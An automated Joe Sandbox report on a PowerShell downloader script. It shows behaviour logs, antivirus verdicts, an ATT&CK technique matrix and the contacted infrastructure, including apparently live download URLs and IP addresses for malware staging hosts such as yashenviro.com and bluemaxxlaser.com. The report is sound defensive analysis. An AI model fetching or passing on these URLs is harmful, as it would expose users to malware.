      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3947Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5888Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2396Thread sleep time: -11068046444225724s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000000.00000002.1594642485.00000147EBD2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-noLogo-ExecutionPolicyunrestricted-fileC:\Users\user\Desktop\ER4HMMzeQ3.ps1-11ee-8c18-
      Source: powershell.exe, 00000000.00000002.1596474042.00000147EBF9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWeP
      Source: powershell.exe, 00000000.00000002.1594642485.00000147EBD2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}II4
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Yara matchFile source: amsi64_5012.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5012, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      PowerShell
      1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Security Software Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      Registry Run Keys / Startup Folder
      21
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Process Injection
      Security Account Manager21
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture4
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets1
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      ER4HMMzeQ3.ps131%VirustotalBrowse
      ER4HMMzeQ3.ps139%ReversingLabsScript-PowerShell.Trojan.PShell
      ER4HMMzeQ3.ps1100%AviraTR/PShell.Dldr.VPA
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://www.microsoft.n0%Avira URL Cloudsafe
      http://yashenviro.com0%Avira URL Cloudsafe
      https://yashenviro.com0%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com0%Avira URL Cloudsafe
      https://www.yashkbbnviro.com/rh/rb.kbbxkbbp0%Avira URL Cloudsafe
      http://crl.microg0%Avira URL Cloudsafe
      http://www.yashenviro.com0%Avira URL Cloudsafe
      https://www.yashenviro.com/rh/rb.exep0%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf0%Avira URL Cloudsafe
      http://www.yashenviro.com.cdn.hstgr.net0%Avira URL Cloudsafe
      http://www.blukbbmaxxlaskbbr.com/rh/List%20of%20rkbbquirkbbd%20itkbbms%20and%20skbbrvickbbs.pdf0%Avira URL Cloudsafe
      https://www.yashenviro.com/rh/rb.exe0%Avira URL Cloudsafe
      https://www.yashenviro.com0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      www.yashenviro.com.cdn.hstgr.net
      84.32.84.229
      truefalse
        unknown
        yashenviro.com
        77.37.83.9
        truefalse
          unknown
          www.bluemaxxlaser.com
          203.175.174.69
          truefalse
            unknown
            www.yashenviro.com
            unknown
            unknownfalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdffalse
              • Avira URL Cloud: safe
              unknown
              https://www.yashenviro.com/rh/rb.exefalse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://www.yashenviro.com/rh/rb.exeppowershell.exe, 00000000.00000002.1573938786.00000147D5212000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1591288211.00000147E3D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1591288211.00000147E3C4E000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://www.yashkbbnviro.com/rh/rb.kbbxkbbppowershell.exe, 00000000.00000002.1573938786.00000147D5212000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://yashenviro.compowershell.exe, 00000000.00000002.1573938786.00000147D5307000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573938786.00000147D5303000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573938786.00000147D52E2000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1573938786.00000147D3E12000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1573938786.00000147D3E12000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.microsoft.npowershell.exe, 00000000.00000002.1596474042.00000147EC035000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.yashenviro.compowershell.exe, 00000000.00000002.1573938786.00000147D52E2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://yashenviro.compowershell.exe, 00000000.00000002.1573938786.00000147D5320000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://go.micropowershell.exe, 00000000.00000002.1573938786.00000147D4812000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://crl.microgpowershell.exe, 00000000.00000002.1594642485.00000147EBD75000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.bluemaxxlaser.compowershell.exe, 00000000.00000002.1573938786.00000147D56F6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contoso.com/powershell.exe, 00000000.00000002.1591288211.00000147E3C4E000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1591288211.00000147E3D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1591288211.00000147E3C4E000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Licensepowershell.exe, 00000000.00000002.1591288211.00000147E3C4E000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.1591288211.00000147E3C4E000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.yashenviro.com.cdn.hstgr.netpowershell.exe, 00000000.00000002.1573938786.00000147D52E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.1573938786.00000147D3BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.blukbbmaxxlaskbbr.com/rh/List%20of%20rkbbquirkbbd%20itkbbms%20and%20skbbrvickbbs.pdfpowershell.exe, 00000000.00000002.1573938786.00000147D3E12000.00000004.00000800.00020000.00000000.sdmp, ER4HMMzeQ3.ps1true
                                • Avira URL Cloud: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1573938786.00000147D3BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1573938786.00000147D3E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.yashenviro.compowershell.exe, 00000000.00000002.1573938786.00000147D52DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    203.175.174.69
                                    www.bluemaxxlaser.comSingapore
                                    24482SGGS-AS-APSGGSSGfalse
                                    84.32.84.229
                                    www.yashenviro.com.cdn.hstgr.netLithuania
                                    33922NTT-LT-ASLTfalse
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1578213
                                    Start date and time:2024-12-19 12:36:26 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 3m 26s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:7
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:ER4HMMzeQ3.ps1
                                    renamed because original name is a hash value
                                    Original Sample Name:e7e0f0c28c75837367088d127100c545ca92a40f20b17fb5eb3205f3583a9c09.ps1
                                    Detection:MAL
                                    Classification:mal80.evad.winPS1@2/5@3/2
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 5
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1
                                    • Stop behavior analysis, all processes terminated
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50
                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 5012 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    TimeTypeDescription
                                    06:37:28API Interceptor43x Sleep call for process: powershell.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    203.175.174.69FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                    • www.bluemaxxlaser.com/ms/ms.vbs
                                    yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                    • www.bluemaxxlaser.com/ms/ms.vbs
                                    0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                    • www.bluemaxxlaser.com/ms/ms.vbs
                                    64Tgzu2FKh.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                    • bluemaxxlaser.com/rh/rheu.bin
                                    zp.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                    • bluemaxxlaser.com/rh/rh.bin
                                    eua.ps1Get hashmaliciousGuLoaderBrowse
                                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                    zp.ps1Get hashmaliciousUnknownBrowse
                                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                    zk.ps1Get hashmaliciousUnknownBrowse
                                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                    mx.ps1Get hashmaliciousUnknownBrowse
                                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                    zpeu.exeGet hashmaliciousGuLoaderBrowse
                                    • bluemaxxlaser.com/rh/rheu.bin
                                    84.32.84.229I_ Importante adeguamento del personale.msgGet hashmaliciousHTMLPhisherBrowse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      www.bluemaxxlaser.comFjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                      • 203.175.174.69
                                      yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                      • 203.175.174.69
                                      0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                      • 203.175.174.69
                                      eua.ps1Get hashmaliciousGuLoaderBrowse
                                      • 203.175.174.69
                                      zp.ps1Get hashmaliciousUnknownBrowse
                                      • 203.175.174.69
                                      zk.ps1Get hashmaliciousUnknownBrowse
                                      • 203.175.174.69
                                      mx.ps1Get hashmaliciousUnknownBrowse
                                      • 203.175.174.69
                                      as.ps1Get hashmaliciousGuLoaderBrowse
                                      • 203.175.174.69
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      NTT-LT-ASLTtruepepe-qt.exeGet hashmaliciousQuasarBrowse
                                      • 84.32.84.101
                                      z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                      • 84.32.84.32
                                      profroma invoice.exeGet hashmaliciousFormBookBrowse
                                      • 84.32.84.32
                                      ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                      • 84.32.84.32
                                      Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                      • 84.32.84.32
                                      SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                      • 84.32.84.32
                                      ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                      • 84.32.84.32
